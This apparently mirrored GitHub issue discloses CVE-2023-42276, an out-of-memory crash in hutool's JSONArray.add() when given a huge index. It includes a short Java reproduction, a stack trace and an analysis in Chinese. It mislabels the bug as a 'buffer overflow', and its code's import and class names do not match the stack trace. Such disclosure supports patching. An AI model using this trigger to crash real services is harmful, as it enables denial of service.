Headline
CVE-2023-42276: `JSONArray`的`add()`方法抛出OutOfMemory异常 · Issue #3286 · dromara/hutool
hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.
版本情况
JDK版本: 1.8.0_362
hutool版本: 5.8.21
问题描述(包括截图)
- 复现代码
import cn.hutool.json.JSONObject;
public class JSONObjectTest {
public static void main(String\[\] args) {
JSONArray jSONArray = new JSONArray();
Object element = new Object();
jSONArray.add(1247626122, element);
}
}
堆栈信息
Exception in thread “main” java.lang.OutOfMemoryError: Java heap space at java.util.Arrays.copyOf(Arrays.java:3210) at java.util.Arrays.copyOf(Arrays.java:3181) at java.util.ArrayList.grow(ArrayList.java:267) at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241) at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233) at java.util.ArrayList.add(ArrayList.java:464) at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594) at cn.hutool.json.JSONArray.add(JSONArray.java:352) at cn.hutool.json.JSONArray.add(JSONArray.java:461) at JSONArrayFuzzerTest19.main(JSONArrayFuzzerTest19.java:37)
测试涉及到的文件(注意脱密)
见复现代码。分析
jsonArray.add(idx, [element)会在指定索引idx添加一个元素element。如果jsonArray长度小于指定索引,jsonArray.add()就会通过循环不断添加null,直到jsonArray的长度等于指定索引值。如果这个索引特别大,比如1247626122,就会报告一个OOM异常。
Related news
hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonArray`.